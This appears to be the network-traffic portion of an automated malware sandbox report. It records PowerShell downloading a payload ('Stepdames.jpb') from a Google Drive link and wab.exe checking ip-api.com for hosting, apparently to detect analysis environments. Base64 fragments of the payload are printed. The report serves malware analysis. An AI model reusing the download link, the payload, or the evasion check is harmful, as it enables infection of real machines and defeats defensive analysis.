                                Jul 3, 2024 08:55:08.085669041 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.085875988 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.085885048 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.086117029 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.086818933 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.087048054 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.087054968 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.087266922 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.088012934 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.088243008 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.088253021 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.088494062 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.089260101 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.089476109 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.089485884 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.089746952 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.090426922 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.090640068 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.090650082 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.090914011 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.091598988 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.091813087 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.091823101 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.092087030 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.092783928 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.092989922 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.092998981 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.093259096 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.093903065 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.094084024 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.094091892 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.094355106 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.094995022 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.095175982 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.095182896 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.095442057 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.096209049 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.096416950 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.096424103 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.096657038 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.097265005 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.097515106 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.097522020 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.097733974 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.098423958 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.098637104 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.098979950 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.099234104 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.099241018 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.099575043 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.100070000 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.100250959 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.100258112 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.100517988 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.101169109 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.101351023 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.101357937 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.101617098 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.102256060 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.102437019 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.102447033 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.102704048 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.103353977 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.103534937 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.103542089 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.103801966 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.104487896 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.104670048 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.104679108 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.104937077 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.105484962 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.105714083 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.105750084 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.105982065 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.106612921 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.106794119 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.106803894 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.107059956 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.107592106 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.107773066 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.107780933 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.108040094 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.108648062 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.108858109 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.108884096 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.109144926 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.109703064 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.109915018 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.109925032 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.110184908 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.110697031 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.110899925 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.110908985 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.111166000 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.111733913 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.111915112 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.111922979 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.112183094 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.112720966 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.112951040 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.112957954 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.113169909 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.113816023 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.113996029 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.114003897 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.114263058 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.114777088 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.115005970 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.115012884 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.115223885 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.115828991 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.116009951 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.116018057 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.116306067 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.116807938 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.117075920 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.117085934 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.117296934 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.117856026 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.118036985 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.118046045 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.118304014 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.118851900 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.119033098 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.119043112 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.119299889 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.119776011 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.120018005 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.120026112 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.120274067 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.120707989 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.120888948 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.120898008 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.121155977 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.121741056 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.121929884 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.121938944 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.122189999 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.122654915 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.122836113 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.123141050 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.123370886 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.123378992 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.123740911 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.124108076 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.124310017 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.124317884 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.124577045 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.125027895 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.125209093 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.125217915 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.125475883 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.125963926 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.126193047 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.126199961 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.126411915 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.126919031 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.127127886 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.127135038 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.127367020 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.127793074 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.127973080 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.127979994 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.128241062 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.128809929 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.128989935 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.128998041 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.129256964 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.129745007 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.129925966 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.129934072 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.130224943 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.130657911 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.130862951 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.130872011 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.131105900 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.131513119 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.131675005 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:08.131692886 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.131962061 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.131962061 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.436341047 CEST49952443192.168.11.30172.217.2.33
                                Jul 3, 2024 08:55:08.436376095 CEST44349952172.217.2.33192.168.11.30
                                Jul 3, 2024 08:55:09.839587927 CEST4995380192.168.11.30208.95.112.1
                                Jul 3, 2024 08:55:09.985367060 CEST8049953208.95.112.1192.168.11.30
                                Jul 3, 2024 08:55:09.985554934 CEST4995380192.168.11.30208.95.112.1
                                Jul 3, 2024 08:55:09.985795021 CEST4995380192.168.11.30208.95.112.1
                                Jul 3, 2024 08:55:10.119771957 CEST8049953208.95.112.1192.168.11.30
                                Jul 3, 2024 08:55:10.170360088 CEST4995380192.168.11.30208.95.112.1
                                Jul 3, 2024 08:56:25.084290028 CEST8049953208.95.112.1192.168.11.30
                                Jul 3, 2024 08:56:25.084532976 CEST4995380192.168.11.30208.95.112.1
                                Jul 3, 2024 08:56:50.132463932 CEST4995380192.168.11.30208.95.112.1
                                Jul 3, 2024 08:56:50.265544891 CEST8049953208.95.112.1192.168.11.30
                                TimestampSource PortDest PortSource IPDest IP
                                Jul 3, 2024 08:54:41.221898079 CEST6096953192.168.11.301.1.1.1
                                Jul 3, 2024 08:54:41.343121052 CEST53609691.1.1.1192.168.11.30
                                Jul 3, 2024 08:54:41.886214018 CEST5308153192.168.11.301.1.1.1
                                Jul 3, 2024 08:54:42.010811090 CEST53530811.1.1.1192.168.11.30
                                Jul 3, 2024 08:55:09.702941895 CEST5886953192.168.11.301.1.1.1
                                Jul 3, 2024 08:55:09.835117102 CEST53588691.1.1.1192.168.11.30
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Jul 3, 2024 08:54:41.221898079 CEST192.168.11.301.1.1.10x6aa7Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                Jul 3, 2024 08:54:41.886214018 CEST192.168.11.301.1.1.10xeb9Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                Jul 3, 2024 08:55:09.702941895 CEST192.168.11.301.1.1.10xef57Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Jul 3, 2024 08:54:41.343121052 CEST1.1.1.1192.168.11.300x6aa7No error (0)drive.google.com142.250.191.110A (IP address)IN (0x0001)false
                                Jul 3, 2024 08:54:42.010811090 CEST1.1.1.1192.168.11.300xeb9No error (0)drive.usercontent.google.com172.217.2.33A (IP address)IN (0x0001)false
                                Jul 3, 2024 08:55:09.835117102 CEST1.1.1.1192.168.11.300xef57No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                • drive.google.com
                                • drive.usercontent.google.com
                                • ip-api.com
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.11.3049953208.95.112.1809032C:\Program Files (x86)\Windows Mail\wab.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 08:55:09.985795021 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                Host: ip-api.com
                                Connection: Keep-Alive
                                Jul 3, 2024 08:55:10.119771957 CEST174INHTTP/1.1 200 OK
                                Date: Wed, 03 Jul 2024 06:55:09 GMT
                                Content-Type: text/plain; charset=utf-8
                                Content-Length: 5
                                Access-Control-Allow-Origin: *
                                X-Ttl: 60
                                X-Rl: 44
                                Data Raw: 74 72 75 65 0a
                                Data Ascii: true


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.11.3049949142.250.191.1104432680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-07-03 06:54:41 UTC215OUTGET /uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76t5 HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                Host: drive.google.com
                                Connection: Keep-Alive
                                2024-07-03 06:54:41 UTC1598INHTTP/1.1 303 See Other
                                Content-Type: application/binary
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Wed, 03 Jul 2024 06:54:41 GMT
                                Location: https://drive.usercontent.google.com/download?id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76t5&export=download
                                Strict-Transport-Security: max-age=31536000
                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                Content-Security-Policy: script-src 'nonce-PiaayuAQ4oaER-6ZX7Mx2w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                Cross-Origin-Opener-Policy: same-origin
                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                Server: ESF
                                Content-Length: 0
                                X-XSS-Protection: 0
                                X-Frame-Options: SAMEORIGIN
                                X-Content-Type-Options: nosniff
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Connection: close


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.11.3049950172.217.2.334432680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-07-03 06:54:42 UTC233OUTGET /download?id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76t5&export=download HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                Host: drive.usercontent.google.com
                                Connection: Keep-Alive
                                2024-07-03 06:54:43 UTC4818INHTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Content-Security-Policy: sandbox
                                Content-Security-Policy: default-src 'none'
                                Content-Security-Policy: frame-ancestors 'none'
                                X-Content-Security-Policy: sandbox
                                Cross-Origin-Opener-Policy: same-origin
                                Cross-Origin-Embedder-Policy: require-corp
                                Cross-Origin-Resource-Policy: same-site
                                X-Content-Type-Options: nosniff
                                Content-Disposition: attachment; filename="Stepdames.jpb"
                                Access-Control-Allow-Origin: *
                                Access-Control-Allow-Credentials: false
                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                Accept-Ranges: bytes
                                Content-Length: 428132
                                Last-Modified: Wed, 03 Jul 2024 00:03:50 GMT
                                X-GUploader-UploadID: ACJd0Nqa0Eu685FA6WIUNeQTo9NGdRCSrAVUByjdgcNySxKOYUnxVvCNXrBlC9U9DYIhucSNsFo
                                Date: Wed, 03 Jul 2024 06:54:43 GMT
                                Expires: Wed, 03 Jul 2024 06:54:43 GMT
                                Cache-Control: private, max-age=0
                                X-Goog-Hash: crc32c=kA3jPQ==
                                Server: UploadServer
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Connection: close
                                2024-07-03 06:54:43 UTC4818INData Raw: 63 51 47 62 36 77 4c 49 69 62 74 6a 2f 42 73 41 63 51 47 62 63 51 47 62 41 31 77 6b 42 4f 73 43 50 43 2f 72 41 6f 41 6a 75 5a 44 2f 32 30 52 78 41 5a 74 78 41 5a 75 42 77 65 71 73 34 36 72 72 41 76 4a 78 63 51 47 62 67 63 47 47 55 30 41 51 36 77 4c 6f 42 65 73 43 79 64 31 78 41 5a 76 72 41 68 38 54 75 68 78 75 45 66 6c 78 41 5a 76 72 41 6f 58 48 36 77 4c 47 53 4f 73 43 45 48 55 78 79 6e 45 42 6d 2b 73 43 4d 7a 69 4a 46 41 74 78 41 5a 76 72 41 71 33 63 30 65 4a 78 41 5a 74 78 41 5a 75 44 77 51 52 78 41 5a 76 72 41 75 65 4c 67 66 6c 64 78 70 77 41 66 4d 74 78 41 5a 76 72 41 67 77 2f 69 30 51 6b 42 48 45 42 6d 2b 73 43 77 71 32 4a 77 33 45 42 6d 2b 73 43 2b 2f 43 42 77 7a 34 6a 63 51 44 72 41 75 42 59 36 77 4c 74 4b 72 71 77 68 56 51 43 63 51 47 62 63 51 47
                                Data Ascii: cQGb6wLIibtj/BsAcQGbcQGbA1wkBOsCPC/rAoAjuZD/20RxAZtxAZuBweqs46rrAvJxcQGbgcGGU0AQ6wLoBesCyd1xAZvrAh8TuhxuEflxAZvrAoXH6wLGSOsCEHUxynEBm+sCMziJFAtxAZvrAq3c0eJxAZtxAZuDwQRxAZvrAueLgfldxpwAfMtxAZvrAgw/i0QkBHEBm+sCwq2Jw3EBm+sC+/CBwz4jcQDrAuBY6wLtKrqwhVQCcQGbcQG
                                2024-07-03 06:54:43 UTC4818INData Raw: 64 34 32 34 50 6d 74 44 36 35 72 63 4a 78 47 7a 4b 33 46 68 45 38 70 65 7a 78 58 67 64 43 48 54 4b 66 33 79 33 75 6f 7a 2b 65 4f 72 35 73 47 43 37 5a 72 33 47 36 38 61 57 79 4c 62 53 78 4c 54 4c 5a 50 47 4a 6f 75 6d 65 32 33 2b 79 53 4f 2f 41 51 56 64 50 70 33 5a 54 57 66 4b 77 55 57 54 4a 6f 53 64 66 74 48 61 4a 56 44 4c 58 33 69 31 50 64 67 6a 70 2b 56 6b 43 44 52 42 39 4a 47 6e 66 64 67 6a 32 48 4f 68 71 4c 6a 42 74 36 4f 4e 75 47 73 72 31 36 57 57 50 74 36 38 64 54 67 39 35 68 6c 49 4d 38 75 55 78 4c 4a 68 38 73 63 7a 67 43 6f 74 6b 79 35 7a 4b 44 6e 33 6a 70 65 45 4c 7a 50 72 6e 33 53 52 31 6d 4d 71 38 68 47 45 6f 62 37 50 47 42 69 6a 48 6e 4d 71 39 37 5a 61 42 49 37 4d 46 6e 48 6c 51 76 35 4d 44 6b 35 62 70 44 38 47 53 4b 72 52 51 71 41 73 69 6b 34
                                Data Ascii: d424PmtD65rcJxGzK3FhE8pezxXgdCHTKf3y3uoz+eOr5sGC7Zr3G68aWyLbSxLTLZPGJoume23+ySO/AQVdPp3ZTWfKwUWTJoSdftHaJVDLX3i1Pdgjp+VkCDRB9JGnfdgj2HOhqLjBt6ONuGsr16WWPt68dTg95hlIM8uUxLJh8sczgCotky5zKDn3jpeELzPrn3SR1mMq8hGEob7PGBijHnMq97ZaBI7MFnHlQv5MDk5bpD8GSKrRQqAsik4
                                2024-07-03 06:54:43 UTC243INData Raw: 4e 38 35 72 47 4f 79 77 64 35 49 62 7a 4f 4d 73 6c 51 65 43 55 57 6c 32 74 7a 54 79 69 61 6c 61 77 6b 6b 34 47 32 47 4c 4e 69 78 73 41 72 4f 51 78 6b 76 50 75 30 78 7a 32 68 6e 76 71 6b 53 66 35 74 79 2b 44 39 5a 6f 76 59 5a 50 67 30 44 62 35 54 58 36 33 5a 37 76 4e 4c 45 47 55 79 2f 56 6a 41 4f 71 77 56 58 62 78 48 39 58 72 4f 66 31 6b 42 74 44 64 76 6a 39 48 2b 48 6e 4e 6b 30 77 5a 51 62 70 46 66 52 68 69 6f 70 6d 46 4a 51 63 6c 39 6b 56 77 65 55 35 34 36 61 38 51 48 67 36 56 4d 44 71 5a 4b 78 5a 51 46 4f 71 4e 4c 4e 63 62 51 4b 7a 58 47 30 43 73 31 78 74 4d 51 58 65 47 53 6d 69 51 4e 42 72 57 5a 70 57 4d 2b 49 4e 71 30 4c 74 67 6a 4d 48 39 4d 6a 75 74 78 77 71 6f 35 65 62 37 75 5a 48 39 35 41 37 6f 6d 78 61 49 7a 4f
                                Data Ascii: N85rGOywd5IbzOMslQeCUWl2tzTyialawkk4G2GLNixsArOQxkvPu0xz2hnvqkSf5ty+D9ZovYZPg0Db5TX63Z7vNLEGUy/VjAOqwVXbxH9XrOf1kBtDdvj9H+HnNk0wZQbpFfRhiopmFJQcl9kVweU546a8QHg6VMDqZKxZQFOqNLNcbQKzXG0Cs1xtMQXeGSmiQNBrWZpWM+INq0LtgjMH9Mjutxwqo5eb7uZH95A7omxaIzO
